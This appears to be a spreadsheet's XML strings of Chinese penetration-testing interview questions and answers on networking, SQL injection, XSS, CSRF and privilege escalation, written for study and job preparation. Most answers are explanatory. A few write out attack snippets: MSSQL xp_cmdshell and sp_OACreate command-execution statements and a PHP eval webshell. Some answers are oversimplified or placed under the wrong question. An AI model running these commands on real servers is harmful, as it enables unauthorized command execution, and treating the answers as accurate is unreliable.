    <t>OSPF（Open Shortest Pass First,开放最短路径优先协议），是一个最常用的内部网管协议，是一个链路状态协议。(网络层协议,)
协议号  89</t>
  </si>
  <si>
    <t>TCP与UDP区别总结？</t>
  </si>
  <si>
    <t xml:space="preserve">1.TCP面向连接（如打电话要先拨号建立连接）提供可靠的服务;UDP是无连接的，即发送数据之前不需要建立连接，;UDP尽最大努力交付，即不保证可靠交付
2.UDP具有较好的实时性，工作效率比TCP高，适用于对高速传输和实时性有较高的通信或广播通信。
3. 每一条TCP连接只能是点到点的;UDP支持一对一，一对多，多对一和多对多的交互通信
4 TCP对系统资源要求比UDP较多，TCP首部开销20字节;UDP的首部开销小，只有8个字节。
5. TCP面向字节流，实际上是TCP把数据看成一连串无结构的字节流;UDP是面向报文的。
</t>
  </si>
  <si>
    <t>GET 和 POST 的区别</t>
  </si>
  <si>
    <t xml:space="preserve">get是获取数据，post是修改数据
</t>
  </si>
  <si>
    <t>Cookies和session区别</t>
  </si>
  <si>
    <t>Cookie和Session都是客户端与服务器之间保持状态的解决方案
1，存储的位置不同，cookie：存放在客户端，session：存放在服务端。Session存储的数据比较安全
2，存储的数据类型不同
两者都是key-value的结构，但针对value的类型是有差异的
cookie：value只能是字符串类型，session：value是Object类型
3，存储的数据大小限制不同
cookie：大小受浏览器的限制，很多是是4K的大小， session：理论上受当前内存的限制，
4，生命周期的控制
cookie的生命周期当浏览器关闭的时候，就消亡了
(1)cookie的生命周期是累计的，从创建时，就开始计时，20分钟后，cookie生命周期结束，
(2)session的生命周期是间隔的，从创建时，开始计时如在20分钟，没有访问session，那么session生命周期被销毁</t>
  </si>
  <si>
    <t>session 的工作原理？</t>
  </si>
  <si>
    <t>session 的工作原理是客户端登录完成之后，服务器会创建对应的 session，session 创建完之后，会把 session 的 id 发送给客户端，客户端再存储到浏览器中。
这样客户端每次访问服务器时，都会带着 sessionid，服务器拿到 sessionid 之后，在内存找到与之对应的 session 这样就可以正常工作了。</t>
  </si>
  <si>
    <t>一次完整的HTTP请求过程</t>
  </si>
  <si>
    <t>域名解析 --&gt; 发起TCP的3次握手 --&gt; 建立TCP连接后发起http请求 --&gt; 服务器响应http请求，浏览器得到html代码 --&gt; 浏览器解析html代码，
并请求html代码中的资源（如js、css、图片等） --&gt; 浏览器对页面进行渲染呈现给用户。</t>
  </si>
  <si>
    <t>HTTPS和HTTP的区别</t>
  </si>
  <si>
    <t>1.HTTP协议传输的数据都是未加密的，也就是明文的，因此使用HTTP协议传输隐私信息非常不安全， HTTPS协议是由SSL+HTTP协议构建的可进行加密传输、身份认证的网络协议，要比http协议安全。
2. https协议需要到ca申请证书，一般免费证书较少，因而需要一定费用。
3、http和https使用的是完全不同的连接方式，用的端口也不一样，前者是80，后者是443。
https://www.cnblogs.com/wqhwe/p/5407468.html</t>
  </si>
  <si>
    <t>OSI 的七层模型都有哪些？</t>
  </si>
  <si>
    <t>http长连接和短连接的区别</t>
  </si>
  <si>
    <t>在HTTP/1.0中默认使用短连接。也就是说，客户端和服务器每进行一次HTTP操作，就建立一次连接，任务结束就中断连接。
而从HTTP/1.1起，默认使用长连接，用以保持连接特性。什么是TCP粘包/拆包？发生原因？解决方案 一个完整的业务可能会被TCP拆分成多个包进行发送，也有可能把多个小的包封装成一个大的数据包发送，这个就是TCP的拆包和粘包问题。
原因：1. 应用程序写入数据的字节大小大于套接字发送缓冲区的大小.2. 进行MSS大小的TCP分段。( MSS=TCP报文段长度-TCP首部长度)3. 以太网的payload大于MTU进行IP分片。（ MTU指：一种通信协议的某一层上面所能通过的最大数据包大小。）
解决方案：1. 消息定长。2. 在包尾部增加回车或者空格符等特殊字符进行分割3. 将消息分为消息头和消息尾。4. 使用其它复杂的协议，如RTMP协议等。</t>
  </si>
  <si>
    <t>TCP如何保证可靠传输？</t>
  </si>
  <si>
    <t>1. 三次握手。
2. 将数据截断为合理的长度。应用数据被分割成 TCP 认为最适合发送的数据块（按字节编号，合理分片）
3. 超时重发。当 TCP 发出一个段后，它启动一个定时器，如果不能及时收到一个确认就重发
4. 确认应答：对于收到的请求，给出确认响应
5. 校验和：校验出包有错，丢弃报文段，不给出响应
6. 序列号：对失序数据进行重新排序，然后才交给应用层
7. 丢弃重复数据：对于重复数据 ， 能够丢弃重复数据
8. 流量控制。TCP 连接的每一方都有固定大小的缓冲空间。TCP 的接收端只允许另一端发送接收端缓冲区所能接纳的数据。这将防止较快主机致使较慢主机的缓冲区溢出。
9. 拥塞控制。当网络拥塞时，减少数据的发送。</t>
  </si>
  <si>
    <t>常见的状态码有哪些？</t>
  </si>
  <si>
    <t>200 OK //客户端请求成功403 Forbidden //服务器收到请求，但是拒绝提供服务
404 Not Found //请求资源不存在，eg：输入了错误的URL
500 Internal Server Error //服务器发生不可预期的错误URI和URL的区别URI，统一资源标识符，用来唯一的标识一个资源。URL可以用来标识一个资源，而且还指明了如何定位这个资源。</t>
  </si>
  <si>
    <t>什么是SSL ？https是如何保证数据传输的安全（SSL是怎么工作保证安全的）</t>
  </si>
  <si>
    <t xml:space="preserve">SSL代表安全套接字层。它是一种用于加密和验证应用程序（如浏览器）和Web服务器之间发送的数据的协议。 身份验证 ， 加密Https的加密机制是一种共享密钥加密和公开密钥加密并用的混合加密机制。SSL/TLS协议作用：认证用户和服务，加密数据，维护数据的完整性的应用层协议加密和解密需要两个不同的密钥，故被称为非对称加密；加密和解密都使用同一个密钥的 对称加密。 优点在于加密、解密效率通常比较高HTTPS 是基于非对称加密的， 公钥是公开的，
（1）客户端向服务器端发起SSL连接请求；
（2） 服务器把公钥发送给客户端，并且服务器端保存着唯一的私钥
（3）客户端用公钥对双方通信的对称秘钥进行加密，并发送给服务器端
（4）服务器利用自己唯一的私钥对客户端发来的对称秘钥进行解密，
（5）进行数据传输，服务器和客户端双方用公有的相同的对称秘钥对数据进行加密解密，可以保证在数据收发过程中的安全，即是第三方获得数据包，也无法对其进行加密，解密和篡改。
</t>
  </si>
  <si>
    <t>TCP对应的应用层协议</t>
  </si>
  <si>
    <t>FTP：定义了文件传输协议，使用21端口.
Telnet：它是一种用于远程登陆的端口,23端口
SMTP：定义了简单邮件传送协议，服务器开放的是25号端口。
POP3：它是和SMTP对应，POP3用于接收邮件。
HTTP
UDP对应的应用层协议
DNS：用于域名解析服务，用的是53号端口
SNMP：简单网络管理协议，使用161号端口
TFTP(Trival File Transfer Protocal)：简单文件传输协议，69</t>
  </si>
  <si>
    <t>SSL工作过程</t>
  </si>
  <si>
    <t>A：客户端，B：服务器端
1.协商加密算法：A向B发送SSL版本号和可选加密算法，B选择自己支持的算法并告知A
2.服务器鉴别：B向A发送包含公钥的数字证书，A使用CA公开发布的公钥对证书进行验证
3.会话密钥计算：A产生一个随机秘密数，用B的公钥进行加密后发送给B，B根据协商的算法产生共享的对称会话密钥并发送给A.
4.安全数据传输：双方用会话密钥加密和解密它们之间传送的数据并验证其完整性</t>
  </si>
  <si>
    <t>sqlmap导出文件 使用脚本参数</t>
  </si>
  <si>
    <t>--dump    --tamper</t>
  </si>
  <si>
    <t>sqlmap os-shell原理</t>
  </si>
  <si>
    <t>就是用into outfile函数将一个可以用来上传的php文件写到网站的根目录下</t>
  </si>
  <si>
    <t>mssql执行命令函数 如何使用</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1. XP_CMDSHELL: </t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="11"/>
        <color rgb="FF0000FF"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>exec master..xp_cmdshell "whoami"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
默认情况下xp_cmdshell是禁止的，可以使用以下命令进行开启
</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="11"/>
        <color rgb="FF0000FF"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
如果xp_cmdshell被删除，可以尝试上传xplog70.dll进行恢复，恢复语句：
</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="11"/>
        <color rgb="FF0000FF"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll'</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
2. SP_OACREATE: 当xp_cmdshell 删除以后，可以使用SP_OACreate
首先要打开组件：
</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="11"/>
        <color rgb="FF0000FF"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>EXEC sp_configure 'show advanced options', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'Ole Automation Procedures', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'show advanced options', 0;</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="11"/>
        <color rgb="FF808080"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">之后使用以下语句执行命令：
</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="11"/>
        <color rgb="FF0000FF"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell,'run',null,'c:\windows\system32\cmd.exe /c whoami &gt;d:\\temp\\1.txt'</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="11"/>
        <color rgb="FF808080"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
更多姿势：https://www.cnblogs.com/R4v3n/articles/9072549.html</t>
    </r>
  </si>
  <si>
    <t>java反序列化函数 原理</t>
  </si>
  <si>
    <t xml:space="preserve">war包了解 spring </t>
  </si>
  <si>
    <t>war包是JavaWeb程序打的包，war包里面包括写的代码编译成的class文件，依赖的包，配置文件，所有的网站页面，包括html，jsp等等。
一个war包可以理解为是一个web项目，里面是项目的所有东西。</t>
  </si>
  <si>
    <t>堆叠注入 具体语句 什么数据库有堆叠注入</t>
  </si>
  <si>
    <t>在";"结束一个sql语句后继续构造下一条语句
Mysql，Sql server，Postgresql</t>
  </si>
  <si>
    <t>xss防御 httponly如何设置 如何查看是否设置</t>
  </si>
  <si>
    <t>Xss单双引号过滤后说出一个payload</t>
  </si>
  <si>
    <t>weblogic tomcat jboss 等含有反序列化漏洞的组件</t>
  </si>
  <si>
    <t>solr elasticsearch 等有哪些漏洞 原理</t>
  </si>
  <si>
    <t>给一个网站链接判断Windows linux 具体从哪判断 大小写的话改哪些</t>
  </si>
  <si>
    <t>bp可以抓哪些协议的包 可以抓icmp吗</t>
  </si>
  <si>
    <t>Php危险函数</t>
  </si>
  <si>
    <t xml:space="preserve">mssql orcale mysql 等数据库漏洞 </t>
  </si>
  <si>
    <t>3306端口渗透 mysql版本区别渗透 如何爆破</t>
  </si>
  <si>
    <t>后台渗透</t>
  </si>
  <si>
    <t>做项目过程中遇见的比较难的漏洞 如何解决的</t>
  </si>
  <si>
    <t>http状态码和作用，其中301和302状态码的区别？</t>
  </si>
  <si>
    <t>用什么方法可以查询到一个服务器的子域名？</t>
  </si>
  <si>
    <t>加入host里面域名立即ping为什么ping不通</t>
  </si>
  <si>
    <t>如何判断cdn，如何绕过cdn</t>
  </si>
  <si>
    <t>一句话木马用菜刀连接的原理，了解菜刀连接的流量机制吗</t>
  </si>
  <si>
    <t>http的方法有几种，其中为什么很多扫描器喜欢用head方法不喜欢用get或者post的方法</t>
  </si>
  <si>
    <t>了解跨域吗？</t>
  </si>
  <si>
    <t>cookie在js中传输的原理，如何防御cookie盗取及利用</t>
  </si>
  <si>
    <t>简述一下域渗透的过程，怎么定位域控，UAC是什么？</t>
  </si>
  <si>
    <t>mimicatz获取用户名和密码的原理</t>
  </si>
  <si>
    <t>如何利用xss漏洞来做一些事情，比如获取cookie，其原理是什么？（非xss基本定义）</t>
  </si>
  <si>
    <t>https://blog.csdn.net/cxrpty/article/details/104417374</t>
  </si>
  <si>
    <t>LDAP是什么，了解吗？</t>
  </si>
  <si>
    <t>LDAP（Light Directory Access Portocol），它是基于X.500标准的轻量级目录访问协议。
目录是一个为查询、浏览和搜索而优化的数据库，它成树状结构组织数据，类似文件目录一样。
LDAP目录服务是由目录数据库和一套访问协议组成的系统。</t>
  </si>
  <si>
    <t>MSF中的meterpreter是什么？获取meterpreter原理是什么？</t>
  </si>
  <si>
    <t xml:space="preserve">Meterpreter可以看成特殊的Payload，之前我们的Payload都是为了获得目标系统的shell
这里的payload就是shellcode，以获得目标系统的shell为目的的payload
通过msfconsole生成的reverse_tcp shellcode，其实就是一个stager，这段shellcode的功能是连接MSF，接收MSF发送回来的payload，利用Reflective Dll Injection技术在内存中直接加载payload。
</t>
  </si>
  <si>
    <t>了解跨域吗？跨域的原理或者说机制是什么？</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>同源策略:</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
请求的url地址,必须与浏览器上的url地址处于同域上,也就是域名,端口,协议相同.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>跨域:</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
浏览器对于javascript的同源策略的限制,例如a.cn下面的js不能调用b.cn中的js,对象或数据(因为a.cn和b.cn是不同域),所以跨域就出现了</t>
    </r>
  </si>
  <si>
    <t>DNS的记录类型有哪些，原理是什么？</t>
  </si>
  <si>
    <t>burpsuite在安装证书后可以拦截https的数据包，那么拦截https数据包的原理是什么？</t>
  </si>
  <si>
    <t>抓包原理：中间代理和监听
导入的是burpsuite自己的证书作证书颁发机构用；burpsuite代理时返回给浏览器的证书是burpsuite针对该网站临时签名的证书，整个导证书操作就为了浏览器收到该临时证书不会报错。
https代理原理：一方面，浏览器发起ssl client hello请求，burpsuite伪造成服务器，给浏览器发回使用burpsuite自己证书为当前目标网站签发的证书与浏览器建立一个连接（我们暂称其为C1）；另burpsuite向真正的服务器发送一个ssl client hello，与真正的服务器建立另一个连接（我们暂称其为C2）。所以真正的请求是浏览器通过C1向burpsuite提交数据，burpsuite又从C1中把http数据拿出来从C2提交到真正的服务器，响应过程则反过来。（burpsuite没有服务器证书对应的私钥所以不能直接把服务器的证书转给浏览器，而只能引入自己的证书，不然到时就解不出http的内容了；burpsuite本质上即是一个中间人，或者说中间人攻击说的就是burpsuite这种形式）</t>
  </si>
  <si>
    <t>对渗透方面了解：比如后台登录，如何爆破？如果出现用户名或密码不正确？
是否还能爆破？接下来怎么做？登录前后端代码怎么写的，用html还是js？如何执行？
校验在前端还是？验证码绕过怎么绕？原理是什么？
如何避免？登录提交是post还是get?</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">利用工具进行爆破：Burpsuite，msf
登录前端可以用html+js来写
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>后端校验的</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
唯一性验证，验证码，敏感词，出错概率高的要做异步校验。
后端校验可以防止接口被私自调用导致破坏数据库结构；避免有人模拟浏览器行为直接给服务器发请求。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>前端校验的</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
必填项、（邮箱、电话号、地址）格式、密码强度检测。
前端校验便于用户纠正（快速反馈），并且减少服务器压力、节省流量（减少无意义的请求），主要对用户友好。
比如手机号码，邮箱号不合法，或者密码强度太弱，在前端校验可以不等后端返回，直接提醒用户不合法，让用户及时知晓并更改，避免不必要的提交，再等待服务器返回错误信息。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>1.服务器端验证码的绕过</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
服务端验证码的的绕过原理主要是因为验证码的校验机制是在服务端的，也就是说需要将用户输入的验证码和服务器端的验证码进行比对，成功以后才能登录成功，反则失败。但是，如果将提交到服务端的验证码数据包进行抓取，然后使用burp suite对其进行暴力破解，就能达到绕过验证码的要求。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>2.客户端验证码的绕过</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
客户端验证码的绕过原理主要是因为验证码的校验机制是在客户端本地的，也就是可以在本地的源码中可以看到的，所以这种验证码的绕过，可以通过burp suite进行抓包，然后修改回应包，将js代码删除就可以绕过验证码了。
提交登录页用的是post</t>
    </r>
  </si>
  <si>
    <t>登录后存在垂直越权或水平越权，如何防御？</t>
  </si>
  <si>
    <t>防范措施
前后端同时对用户输入信息进行校验，双重验证机制
调用功能前验证用户是否有权限调用相关功能
执行关键操作前必须验证用户身份，验证用户是否具备操作数据的权限
直接对象引用的加密资源ID，防止攻击者枚举ID，敏感数据特殊化处理
永远不要相信来自用户的输入，对于可控参数进行严格的检查与过滤</t>
  </si>
  <si>
    <t>编程语言会哪些？说一个擅长的，并结合渗透测试具体漏洞说说（前后台都要说）</t>
  </si>
  <si>
    <t>说一个最擅长的web漏洞，原理详细说明，从代码到执行（越细致越好），比如XSS，
反射型*xss执行原理，如何防御，过滤字符标签，但是前端本身就有检查，怎么做？
（注：就是你所知道到防御手段进一步具体细化来说）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">直接Burpsuite抓包 之后 丢去sqlmap里面
 1. 按执行效果：布尔盲注、时间盲注、显错注入、联合查询注入、堆叠注入、宽字节注入
 2. 按方式可分为GET、POST、COOKIE、HTTP HEADER
 3. 按注入点可分为数字型、字符型、搜索型
 4. SQL注入的特征：sql语句 例：union select 。。。或各种变形形
 5. 二阶注入：双请求 第一个请求构造 第二个请求触发
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>sql注入漏洞如何防范：</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
1.使用安全的API，避免使用解释器
2.对输入的特殊的字符进行ESCAPE转义处理
例子：LIKE ‘%M%’ ESCAPE ‘M’
使用ESCAPE关键字定义了转义字符“M”，告诉DBMS将搜索字符串“%M%”中的第二个百分符（%）作为实际值，而不是通配符
3.使用白名单来规范化的输入验证方法
</t>
    </r>
  </si>
  <si>
    <t>脏牛提权原理</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">linux内核的子系统在处理写入时复制至产生了竞争条件，恶意用户可利用此漏洞来获取高权限，对只读内存映射进行访问。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>竞争条件</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>，指的是任务执行顺序异常，可导致应用奔溃，或令攻击者有机可乘，进一步执行其他代码，利用这一漏洞，攻击者可在其目标系统提升权限，甚至可能获取到root权限。</t>
    </r>
  </si>
  <si>
    <t>Linux内核的内存子系统在处理写入时复制时产生了竞争条件。恶意用户可利用此漏洞，
来获取高权限，对只读内存映射进行写访问。竞争条件，指的是任务执行顺序异常，
可导致应用崩溃，或令攻击者有机可乘，进一步执行其他代码。
利用这一漏洞攻击者可在其目标系统提升权限，甚至可能获得root权限 
如果说了上面的，就会接着问，内核是什么？竞争条件是什么？
任务执行顺序为什么异常？具体深入理解，详细说明……</t>
  </si>
  <si>
    <t>你平常主要是怎么进行渗透测试工作的？</t>
  </si>
  <si>
    <t>了解SQL注入吗？sql注入除了可以拿用户名和密码还可以干什么？怎么做？</t>
  </si>
  <si>
    <t>https://blog.csdn.net/jessiecollection/article/details/9850435?ops_request_misc=&amp;request_id=&amp;biz_id=102&amp;utm_term=sql%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB%E7%9A%84%E5%8D%B1%E5%AE%B3&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-6-9850435.pc_search_result_cache</t>
  </si>
  <si>
    <t>了解xss吗？xss简要的讲一下。了解过xss怎么拿shell吗？</t>
  </si>
  <si>
    <t>XSS原理 
反射型
用户提交的数据中可以构造代码来执行，从而实现窃取用户信息等攻击。
需要诱使用户“点击”一个恶意链接，才能攻击成功
储存型
存储型XSS会把用户输入的数据“存储”在服务器端。
这种XSS具有很强的稳定性。
DOM型
通过修改页面的DOM节点形成的XSS，称之为DOM Based XSS。
DOM型和反射型的区别
https://www.lurbk.com/lur1823.html</t>
  </si>
  <si>
    <t>了解shell吗？什么是shell？如果攻击者拿到shell后被你发现，你会怎么做？</t>
  </si>
  <si>
    <t>Shell本身是一个用C语言编写的程序，它是用户使用Unix/Linux的桥梁，用户的大部分工作都是通过Shell完成的。
Shell既是一种命令语言，又是一种程序设计语言。作为命令语言，它交互式地解释和执行用户输入的命令；作为程序设计语言，
它定义了各种变量和参数，并提供了许多在高级语言中才具有的控制结构，包括循环和分支</t>
  </si>
  <si>
    <t>了解过csrf吗？原理是什么？应该怎么防御？其他逻辑漏洞呢，一般是怎么发现？</t>
  </si>
  <si>
    <t>CSRF（Cross-site request forgery）跨站请求伪造：攻击者诱导受害者进入第三方网站，在第三方网站中，向被攻击网站发送跨站请求。利用受害者在被攻击网站已经获取的注册凭证，绕过后台的用户验证，达到冒充用户对被攻击的网站执行某项操作的目的。
修复方式：（因为CSRF通常从第三方网站发起，被攻击的网站无法防止攻击发生，只能通过增强自己网站针对CSRF的防护能力来提升安全性）
详情见网址：https://tech.meituan.com/2018/10/11/fe-security-csrf.html
https://mp.weixin.qq.com/s?src=11&amp;timestamp=1614865603&amp;ver=2926&amp;signature=hdr*wba9*URTJk1KnmqfDiIBXHtd0t32ixJukn7p6krSmpzPmRCxcNISM-6JjGzvBMGEUu1aGOY-OJ6TjlF77yHwFP1Gk*0PeaoVDkVf9yajkYTJHLQhhPZD5W7xXiZj&amp;new=1</t>
  </si>
  <si>
    <t>你了解安全测试吗？（不光是渗透测试）从你的角度来看应该注意一些什么？</t>
  </si>
  <si>
    <t>你测试过哪些最常见的漏洞？</t>
  </si>
  <si>
    <t>sql注入和xss以及一些逻辑漏洞，文件上传，文件包含，命令执行</t>
  </si>
  <si>
    <t>sql盲注有哪些类型？（需要详细回答出时间型，布尔型和报错型）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">sql 盲注是 sql 注入的一种类型，盲注的基本条件要符合用户能够控制输入；原程序要执行的代码拼接了用户输入的数据。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>盲注的类型分为：</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">基于布尔型和基于时间盲注。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基于布尔的盲注：</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">sqlmap 替换或附加到 HTTP 请求中的受影响参数，包含 SELECT 子语句的语法有效的 SQL 语句字符串，或用户要检索其输出的任何其他 SQL 语句。对于每个 HTTP 响应，通过在 HTTP 响应标头 / 正文与原始请求之间进行比较，该工具可以逐字符推断注入的语句的输出。或者，用户可以提供字符串或正则表达式以匹配 True 页面。在 sqlmap 中实现的用于执行此技术的二等分算法能够获取最多七个 HTTP 请求的输出每个字符。如果输出不在明文纯字符集内，则 sqlmap 将采用更大范围的算法来检测输出。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基于时间的盲注：</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>sqlmap 替换或附加到 HTTP 请求中的受影响参数，该语法有效的 SQL 语句字符串包含查询，该查询将使后端 DBMS 保留一定的秒数。对于每个 HTTP 响应，通过在 HTTP 响应时间和原始请求之间进行比较，该工具可以逐字符推断注入的语句的输出。像基于布尔的技术一样，应用二等分算法。</t>
    </r>
  </si>
  <si>
    <t>报错型注入一般用哪些函数？作用是什么？</t>
  </si>
  <si>
    <t>https://blog.csdn.net/weixin_30852451/article/details/98668307</t>
  </si>
  <si>
    <t>怎么样判断一个站，像?id=1后面怎么样进行判断是否有注入点？</t>
  </si>
  <si>
    <t>oder by注入点怎么注入？（java类型）</t>
  </si>
  <si>
    <t>https://blog.csdn.net/weixin_42298415/article/details/113432858</t>
  </si>
  <si>
    <t>文件包含漏洞涉及的PHP函数有哪些？远程文件包含的条件是什么（PHP里面开启的条件）</t>
  </si>
  <si>
    <t>https://blog.csdn.net/weixin_45677119/article/details/111459258</t>
  </si>
  <si>
    <t>文件包含的利用方式？（强调会利用文件上传）</t>
  </si>
  <si>
    <t>引入一段用户能控制的脚本或代码，并让服务器端执行 include()等函数通过动态变量的方式引入需要包含的文件；</t>
  </si>
  <si>
    <t>xss的原理详细说明一下。反射型和DOM型的区别？</t>
  </si>
  <si>
    <t>xss能做什么：
网络钓鱼、窃取用户Cookies、弹广告刷流量、具备改页面信息、删除文章、获取客户端信息、传播蠕虫
XSS原理：它指的是恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意的特殊目的。多是被动型，故常用于钓鱼
存储型xss原理?
如网站留言版，把插入的记录存储在数据库中，插入的代码会一直留在页面上，当其它用户访问会从数据库中读取并触发漏洞。
DOM型就是JavaScript中的Document对象HTML注入，直接浏览器处理。</t>
  </si>
  <si>
    <t>PHP一句话木马的原理。（着重说明eval函数和类型（POST或者GET））</t>
  </si>
  <si>
    <t>利用eval函数原理，执行恶意PHP代码：eval() 函数把字符串按照 PHP 代码来计算。（eval($_GET["cmd"]);）
get型：通过gei型请求传递字符串参数
post型：通过post传递字符串型参数</t>
  </si>
  <si>
    <t>文件上传的原理。</t>
  </si>
  <si>
    <t>文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷，而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马，病毒，恶意脚本或者WebShell等</t>
  </si>
  <si>
    <t>csrf的漏洞原理。</t>
  </si>
  <si>
    <t>CSRF是跨站请求伪造攻击，XSS是实现CSRF的诸多手段中的一种，是由于没有在关键操作执行时进行是否由用户自愿发起的确认。
